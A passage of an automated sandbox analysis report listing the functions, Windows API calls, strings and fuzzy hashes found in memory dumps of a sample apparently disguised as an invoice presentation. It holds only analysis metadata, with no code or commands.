RegDeleteKeyA.ADVAPI32(?,Insertable), ref: 00BDEFD0
RegDeleteKeyA.ADVAPI32(?,Insertable), ref: 00BDEFDA

Strings

InprocServer32, xrefs: 00BDEF6F
Insertable, xrefs: 00BDEEC7, 00BDEEF8, 00BDEFC7, 00BDEFCC, 00BDEFD6
ThreadingModel, xrefs: 00BDEF96
Free, xrefs: 00BDEF4D
Both, xrefs: 00BDEF5A, 00BDEF88, 00BDEF91

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Close$Delete$CreateOpenValue_strlen
String ID: Both$Free$InprocServer32$Insertable$ThreadingModel
API String ID: 3156013049-368911742
Opcode ID: 243d2b2d22d298d28f29bcea58723980dbf95fd523c5502274fee7f25275f0cc
Instruction ID: 6306676b19ec0c3f7d0a86640f0d744d709d22929cb6985bb6e9dd49dfa2dfcc
Opcode Fuzzy Hash: 243d2b2d22d298d28f29bcea58723980dbf95fd523c5502274fee7f25275f0cc
Instruction Fuzzy Hash: 9A31B671A0031DEFEB206F958C85FBFBBB9EB04744F04456AF925AA391E6708D0486A1

Uniqueness

Uniqueness Score: -1.00%

Function 00BE8E56, Relevance: 22.7, APIs: 15, Instructions: 246windowCOMMON

Download Yara Rule

APIs

GetDlgCtrlID.USER32(?), ref: 00BE8EE9
GetDlgItem.USER32 ref: 00BE8F99
ShowWindow.USER32(00000000,00000000), ref: 00BE8FA7
GetMenu.USER32(?), ref: 00BE8FB9
InvalidateRect.USER32(?,00000000,00000001), ref: 00BE8FD5
GetDlgItem.USER32 ref: 00BE9021
SetWindowLongA.USER32 ref: 00BE9035
GetDlgItem.USER32 ref: 00BE9051
GetDlgItem.USER32 ref: 00BE9067
SetWindowLongA.USER32 ref: 00BE9079
SetWindowLongA.USER32 ref: 00BE9085
InvalidateRect.USER32(?,00000000,00000001), ref: 00BE9098
SetMenu.USER32(?,00000000), ref: 00BE90AF
GetDlgItem.USER32 ref: 00BE910C
ShowWindow.USER32(?,00000005), ref: 00BE911A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ItemWindow$Long$InvalidateMenuRectShow$Ctrl
String ID:
API String ID: 599340499-0
Opcode ID: 66ecf9a1e496a9b0e34b7e1d72bfa733d615e5317e2cab05984ca705d0e3b514
Instruction ID: 19b59b4221e1a08707368e76158e13cc863788cfc49ce1f7d28e34dd0bfd9f99
Opcode Fuzzy Hash: 66ecf9a1e496a9b0e34b7e1d72bfa733d615e5317e2cab05984ca705d0e3b514
Instruction Fuzzy Hash: 78A15B35A00756EFDB149F65C888BADBBB5FF08311F0446A5E919E73A0DB70AD40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BEC7D9, Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BEC7E0
GetIconInfo.USER32(?,?), ref: 00BEC881
GetObjectA.GDI32(?,00000018,?), ref: 00BEC890
CreateCompatibleDC.GDI32(00000000), ref: 00BEC8BF
CopyImage.USER32 ref: 00BEC8DB
SelectObject.GDI32(?,00000000), ref: 00BEC8F0
FillRect.USER32 ref: 00BEC933
DrawIconEx.USER32 ref: 00BEC954
SelectObject.GDI32(?,?), ref: 00BEC965
DeleteObject.GDI32(?), ref: 00BEC96E
DeleteObject.GDI32(?), ref: 00BEC983
DeleteObject.GDI32(?), ref: 00BEC98C
DestroyIcon.USER32(?,00000070,00BEBBA7,00000000,00000001,00000000,00000000,00000000,00000000,MFCButton_ImageID,?,00000000,MFCButton_ImageType,?,00000000,MFCButton_CursorType), ref: 00BEC9DF
DestroyIcon.USER32(?), ref: 00BEC9EC
DestroyIcon.USER32(?), ref: 00BEC9F7

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$Icon$DeleteDestroy$Select$CompatibleCopyCreateDrawFillH_prolog3_ImageInfoRect
String ID:
API String ID: 2061919445-0
Opcode ID: 3709e879fa2e5fc635ca1d29d8bd82affa0930e01adbb682a705ffbf5afda689
Instruction ID: b043b556f9d380d4deebc504b185b0f23bdd3c9917a4cee85162a80f3d031611
Opcode Fuzzy Hash: 3709e879fa2e5fc635ca1d29d8bd82affa0930e01adbb682a705ffbf5afda689
Instruction Fuzzy Hash: E4612475E00249DFDB15DFA5D989AEEBBF5EF08301F148269E802E7251DB349D01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C04A08, Relevance: 22.6, APIs: 15, Instructions: 134windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C04A0F
GetObjectA.GDI32(?,00000018,?), ref: 00C04A4A
CreateCompatibleDC.GDI32(00000000), ref: 00C04A64
SelectObject.GDI32(?,?), ref: 00C04A85
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C04AA3
SelectObject.GDI32(?,?), ref: 00C04AB6
CreateCompatibleDC.GDI32(?), ref: 00C04AD0
SelectObject.GDI32(?,?), ref: 00C04AE5
SelectObject.GDI32(?,?), ref: 00C04AF8
DeleteObject.GDI32(?), ref: 00C04B01

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$BitmapDeleteH_prolog3
String ID:
API String ID: 1411732462-0
Opcode ID: d88099fddf1a685438e006e6948c142c9d1452d412fd2077d08bdceb93317eef
Instruction ID: d31f5246cdefceef5f66ce6491e4c9b1cdb776f96472f82043c7bd0854bd0704
Opcode Fuzzy Hash: d88099fddf1a685438e006e6948c142c9d1452d412fd2077d08bdceb93317eef
Instruction Fuzzy Hash: 8951067190061AEFDF099FA4DC45EEEBFB9FF08300B148129F611A22A0CB719955DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2EEF, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 210registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BC2EF9
StringFromGUID2.OLE32(?,?,00000027,00000608), ref: 00BC2F1D

Part of subcall function 00BA3A52: __EH_prolog3.LIBCMT ref: 00BA3A59

StringFromGUID2.OLE32(?,?,00000000), ref: 00BC2F5A

Part of subcall function 00BD583E: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00BD5865
Part of subcall function 00BD583E: _strlen.LIBCMT ref: 00BD5872

swprintf.LIBCMT ref: 00BC3008
swprintf.LIBCMT ref: 00BC3086
swprintf.LIBCMT ref: 00BC30BA
RegCloseKey.ADVAPI32(?), ref: 00BC31EC
RegCloseKey.ADVAPI32(00000000), ref: 00BC31F7

Part of subcall function 00B9DFA0: WideCharToMultiByte.KERNEL32(00000003,00000000,00BA787A,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,?,00BA787A,?), ref: 00B9DFBE
Part of subcall function 00B9DFA0: WideCharToMultiByte.KERNEL32(00000003,00000000,00BA787A,000000FF,00000014,-00000001,00000000,00000000,?,00BA787A,?), ref: 00B9DFF4

Part of subcall function 00BDEFEE: __EH_prolog3_GS.LIBCMT ref: 00BDEFF8
Part of subcall function 00BDEFEE: RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,00000000,?,00000001,?,?,?,?,?,?), ref: 00BDF167

Part of subcall function 00BDEEA8: RegCloseKey.ADVAPI32(00000000,00000000,Insertable,00000000,00000000,0002001F,00000000,00000000,00000000,?,?,?,?,00000000,00000000,0002001F), ref: 00BDEF15
Part of subcall function 00BDEEA8: RegCloseKey.ADVAPI32(00000000,00000000,Insertable,00000000,00000000,0002001F,00000000,00000000,00000000,?,?), ref: 00BDEF24
Part of subcall function 00BDEEA8: RegOpenKeyExW.ADVAPI32(0002001F,InprocServer32,00000000,00020006,00000000,00000000,?,?,?,?,00000000,00000000,0002001F,00000000,00000000), ref: 00BDEF77
Part of subcall function 00BDEEA8: _strlen.LIBCMT ref: 00BDEF89
Part of subcall function 00BDEEA8: RegSetValueExA.ADVAPI32(00000001,ThreadingModel,00000000,00000001,?,00000001), ref: 00BDEF9E
Part of subcall function 00BDEEA8: RegCloseKey.ADVAPI32(?), ref: 00BDEFAC

Strings

%Ts%Ts, xrefs: 00BC30AF
%TsCLSID\%Ts, xrefs: 00BC307B
Software\Classes\, xrefs: 00BC302F, 00BC307A
%d.%d, xrefs: 00BC2FFB

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Close$swprintf$ByteCharFromH_prolog3_MultiStringWide_strlen$FileH_prolog3ModuleNameOpenValue
String ID: %Ts%Ts$%TsCLSID\%Ts$%d.%d$Software\Classes\
API String ID: 3882155136-2208287894
Opcode ID: 4cbe9c65005c6e5f1bf9f0801fd7305dd87a571b4c58ee193b64e94863b7a5ce
Instruction ID: b34cdf7898e5ac2b03e935f6ae2e52ffacdc21dbfedde40e5ebae6bebef3a82c
Opcode Fuzzy Hash: 4cbe9c65005c6e5f1bf9f0801fd7305dd87a571b4c58ee193b64e94863b7a5ce
Instruction Fuzzy Hash: C991397190066A9FDF24DB60CD85FEFB7B8AB44705F0440EAA509A7281EB759F84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2D8C, Relevance: 21.2, APIs: 14, Instructions: 207windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BB2D93
GetSysColor.USER32(00000014), ref: 00BB2DCA

Part of subcall function 00BB24E7: __EH_prolog3.LIBCMT ref: 00BB24EE
Part of subcall function 00BB24E7: CreateSolidBrush.GDI32(?), ref: 00BB2509

GetSysColor.USER32(00000010), ref: 00BB2DDF

Part of subcall function 00BB24E7: __EH_prolog3.LIBCMT ref: 00BB2532
Part of subcall function 00BB24E7: CreatePatternBrush.GDI32(00000000), ref: 00BB2550

CreateCompatibleDC.GDI32(00000000), ref: 00BB2DFF
CreateCompatibleDC.GDI32(00000000), ref: 00BB2E20
GetObjectA.GDI32(00000004,00000018,?), ref: 00BB2E43
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00BB2E5C
GetPixel.GDI32(?,00000000,00000000), ref: 00BB2EA3
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,Function_00130020), ref: 00BB2ECA
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 00BB2EF2

Part of subcall function 00BB455B: SelectObject.GDI32(?,00000000), ref: 00BB457B
Part of subcall function 00BB455B: SelectObject.GDI32(?,00000000), ref: 00BB4591

BitBlt.GDI32(00000004,?,?,?,?,?,00000000,00000000,00E20746), ref: 00BB2F58
BitBlt.GDI32(00000004,?,?,?,?,?,00000000,00000000,00E20746), ref: 00BB2F84

Part of subcall function 00BB44E2: SelectObject.GDI32(?,00C3F98C), ref: 00BB44EB

DeleteDC.GDI32(00000000), ref: 00BB2FF9
DeleteDC.GDI32(00000000), ref: 00BB3018

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Create$Object$H_prolog3Select$BrushColorCompatibleDelete$BitmapPatternPixelSolid
String ID:
API String ID: 3281905939-0
Opcode ID: a6a26e10bf773b614f3534d52c0dfd51df3e8546fd96aed1eef31d6d53ebddd4
Instruction ID: 2fb33048a1a0880e44f8d05cef15c8ab58aab63d91bfa9cd97c037931ac9fc18
Opcode Fuzzy Hash: a6a26e10bf773b614f3534d52c0dfd51df3e8546fd96aed1eef31d6d53ebddd4
Instruction Fuzzy Hash: 34812571D00209EBCF15AFA4CC99EEEBBB9FF58700F044159F905A72A1CBB19A05DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BD8F95, Relevance: 19.9, APIs: 13, Instructions: 358windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD8F00: SendMessageA.USER32(00000000,00000474,00000000,00000000), ref: 00BD8F0C

SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00BD90CD
SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00BD9239
SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00BD9259
SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00BD92F8
SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00BD90AD

Part of subcall function 00BD93DF: lstrcpyA.KERNEL32(?,00DBF11C), ref: 00BD940D
Part of subcall function 00BD93DF: SendMessageA.USER32(?,00001305,?,00000001), ref: 00BD9443
Part of subcall function 00BD93DF: DestroyIcon.USER32(00000000,00000000,?,00000000,000000FF,?,?,?,00000000), ref: 00BD948F

SendMessageA.USER32(?,00001109,00000000,?), ref: 00BD9147
SendMessageA.USER32(?,00001109,00000002,?), ref: 00BD9162
SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00BD9197
SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00BD91B7
SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00BD9318
SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00BD9375
SendMessageA.USER32(?,00001306,?,?), ref: 00BD9392
SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00BD93A1

Part of subcall function 00C2D758: __EH_prolog3.LIBCMT ref: 00C2D75F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$DestroyH_prolog3Iconlstrcpy
String ID:
API String ID: 3647774502-0
Opcode ID: fcb662a99a643c5ab20cee254630352d38c76df3499601392783b53e4d2b4ce7
Instruction ID: 45074bc6ede4efecda5bb02b9d9ed8111afe213edee3aeeed69aee5be797d1f3
Opcode Fuzzy Hash: fcb662a99a643c5ab20cee254630352d38c76df3499601392783b53e4d2b4ce7
Instruction Fuzzy Hash: 3CD139B1A00209EFDB159F69DC849EEBBF9FF48354F1441AAE505A7390DB31AD40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D9C3C8, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00D9C40C

Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B5C0
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B5D2
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B5E4
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B5F6
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B608
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B61A
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B62C
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B63E
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B650
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B662
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B674
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B686
Part of subcall function 00D9B5A3: _free.LIBCMT ref: 00D9B698

_free.LIBCMT ref: 00D9C401

Part of subcall function 00D8DC18: HeapFree.KERNEL32(00000000,00000000,?,00D8AC8D), ref: 00D8DC2E
Part of subcall function 00D8DC18: GetLastError.KERNEL32(?,?,00D8AC8D), ref: 00D8DC40

_free.LIBCMT ref: 00D9C423
_free.LIBCMT ref: 00D9C438
_free.LIBCMT ref: 00D9C443
_free.LIBCMT ref: 00D9C465
_free.LIBCMT ref: 00D9C478
_free.LIBCMT ref: 00D9C486
_free.LIBCMT ref: 00D9C491
_free.LIBCMT ref: 00D9C4C9
_free.LIBCMT ref: 00D9C4D0
_free.LIBCMT ref: 00D9C4ED
_free.LIBCMT ref: 00D9C505

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 537979610901a0bb18dd81ab551ccd7933c1a6c2cf05302ae6fff9dfd1e4fbb1
Instruction ID: fde0285c5a1d3478f9c35c1197513f566ebbaf8e6547ba11a55567cdcdc7fcb8
Opcode Fuzzy Hash: 537979610901a0bb18dd81ab551ccd7933c1a6c2cf05302ae6fff9dfd1e4fbb1
Instruction Fuzzy Hash: 61315A71614205AFEF20AA39D955B6A73E9EF54320F28982AE059D71D1DBB0FD80CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00BEA067, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BEA06E

Part of subcall function 00BBE901: GetWindowLongA.USER32 ref: 00BBE90E

_strlen.LIBCMT ref: 00BEA0C6
swprintf.LIBCMT ref: 00BEA0BD

Part of subcall function 00BB0119: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB012B

_strlen.LIBCMT ref: 00BEA0E1
_strlen.LIBCMT ref: 00BEA097

Part of subcall function 00BA412F: _memcpy_s.LIBCMT ref: 00BA4195

_strlen.LIBCMT ref: 00BEA118
_strlen.LIBCMT ref: 00BEA129
swprintf.LIBCMT ref: 00BEA14F
_strlen.LIBCMT ref: 00BEA158

Strings

- , xrefs: 00BEA0DB, 00BEA0E0, 00BEA0E8, 00BEA112, 00BEA117, 00BEA11F
:%d, xrefs: 00BEA0B2, 00BEA144

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _strlen$swprintf$H_prolog3_LongWindow__vswprintf_c_l_memcpy_s
String ID: - $:%d
API String ID: 2867934678-2359489159
Opcode ID: 37a64c757d3190ddc7036d587c27ed06e883e26f83733a0601d6a21a1d4a6aa2
Instruction ID: 3e73b5230e7ea41a75168f553669889fe5abd67199e3952345c66661d73cbf76
Opcode Fuzzy Hash: 37a64c757d3190ddc7036d587c27ed06e883e26f83733a0601d6a21a1d4a6aa2
Instruction Fuzzy Hash: F7313A72900109ABDB14FAE0DD57EFEB3ACEF15350F004069B506BB156EB74AA489BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00BD69D3, Relevance: 18.2, APIs: 12, Instructions: 173windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD696C: LoadCursorA.USER32 ref: 00BD6984
Part of subcall function 00BD696C: LoadCursorW.USER32(?,00007901), ref: 00BD69A1

PeekMessageA.USER32 ref: 00BD6A09
PostMessageA.USER32(?,00000111,0000E145,?), ref: 00BD6A85
SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 00BD6AAA
GetCursorPos.USER32(?), ref: 00BD6AC7
PeekMessageA.USER32 ref: 00BD6AF3
ReleaseCapture.USER32(?,?,00000000), ref: 00BD6B4A
SetCapture.USER32(?), ref: 00BD6B53
ReleaseCapture.USER32(00000000), ref: 00BD6B5F
SendMessageA.USER32(?,00000362,?,00000000), ref: 00BD6B71
SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 00BD6BB1
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 00BD6BDE

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Message$CaptureCursorSend$LoadPeekPostRelease
String ID:
API String ID: 291007519-0
Opcode ID: 1a95447b630c8b65dcd2a0a76fda82a0795c9e88640685336eb160fd736bcca3
Instruction ID: 9f7416e7ec13c2ee98d6d5392d9e0b6e72426db999ae35265b19830e0b05a4f5
Opcode Fuzzy Hash: 1a95447b630c8b65dcd2a0a76fda82a0795c9e88640685336eb160fd736bcca3
Instruction Fuzzy Hash: CA514C75A00214EFDF119F55DC89EAEBBB9EF84700F1541AAE905EB3A2DB709D01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0FED, Relevance: 18.2, APIs: 12, Instructions: 157threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BC0FF4

Part of subcall function 00BBE4D3: GetDlgItem.USER32 ref: 00BBE4E4

GetWindowTextLengthA.USER32(?), ref: 00BC1022
GetWindowTextA.USER32 ref: 00BC1051

Part of subcall function 00BB7658: MultiByteToWideChar.KERNEL32(00000003,00000000,?,00BBF834,00000000,00000000,00000000,?,75C6CF00,?,00BB764D,00000008,?,00BBF834,?,00BA0764), ref: 00BB766B
Part of subcall function 00BB7658: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00BB7675
Part of subcall function 00BB7658: MultiByteToWideChar.KERNEL32(00000003,00000000,?,00BBF834,00000000,00000000,?,00BB764D,00000008,?,00BBF834,?,00BA0764,?,?,?), ref: 00BB768C

GetThreadLocale.KERNEL32(00000000,?,000000FF), ref: 00BC1081
VarDecFromStr.OLEAUT32(00000000,00000000), ref: 00BC1089
SysFreeString.OLEAUT32(?), ref: 00BC1094

Part of subcall function 00BB0CE0: __EH_prolog3.LIBCMT ref: 00BB0CE7

Part of subcall function 00BB6149: SetFocus.USER32(00000000,00000000,?,?,?,?,00BB570B,?,00000030,0000F114,?,0000F114), ref: 00BB6173
Part of subcall function 00BB6149: SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 00BB618B

GetThreadLocale.KERNEL32(00000000,?,?,?,?,0000000C), ref: 00BC10BD
VarBstrFromDec.OLEAUT32(?,00000000), ref: 00BC10C7
SysFreeString.OLEAUT32(?), ref: 00BC10E6
__EH_prolog3.LIBCMT ref: 00BC1117
GetWindowTextLengthA.USER32(?), ref: 00BC1141
GetWindowTextA.USER32 ref: 00BC1170

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: TextWindow$H_prolog3String$ByteCharFreeFromLengthLocaleMultiThreadWide$AllocBstrFocusItemMessageSend
String ID:
API String ID: 3540346206-0
